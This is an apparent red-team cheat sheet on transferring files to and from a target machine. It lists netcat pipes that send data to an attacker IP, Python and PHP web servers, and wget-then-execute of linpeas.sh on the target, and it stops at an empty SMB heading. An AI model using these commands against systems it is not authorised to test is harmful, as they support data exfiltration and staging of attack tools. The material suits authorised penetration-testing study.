Red Team File Transfers, All the Ways
Netcat File Transfer
- Step 1
- Create a file on the target box in the /tmp directory
touch file.txt
- Set up the listener and direct STDOUT into the new file
nc -nlvp 1234 > file.txt
nc [target box ip] 1234 < file-to-be-transfered.txt
Method Two
- On the attacker machine run:
nc -lvp 443> transfer.txt
cat transfer.txt | nc $attackerip 443
NC Transfer with gzip data
//on target machine
nc -nvlp 10000 | gzip -d > .y
//local machine
cat ~/tools/static-binaries/socat/socat | gzip -c - | nc 127.0.0.1 10000
// check md5 hashes match on both systems
Web Servers:
Python HTTP Server File Transfer
- Start the Python Server in the directory where the file is located that you want to transfer
- Use the ip address assigned to your box, if there is a vpn involved use the vpn address
python3 -m http.server
python -m SimpleHTTPServer 8000
- Above is for python
- You can optionally specify a port that you want the server to run on (it defaults to 8000)
python3 -m http.server 80
- wget the file from the target box
wget http://172.16.6.1:8000/linpeas.sh
- Change permissions
- Run the transferred file
chmod +x linpeas.sh
./linpeas.sh
PHP Web Server
php -S $ip:80 #on attacker machine to host the file
wget http://[attacker-ip]:80/file-to-download
Metasploit Web Server
use auxiliary/server/ftp
auxiliary/server/tftp
- Follow the metasploit instructions. They are rather straightforward
SMB File Transfer
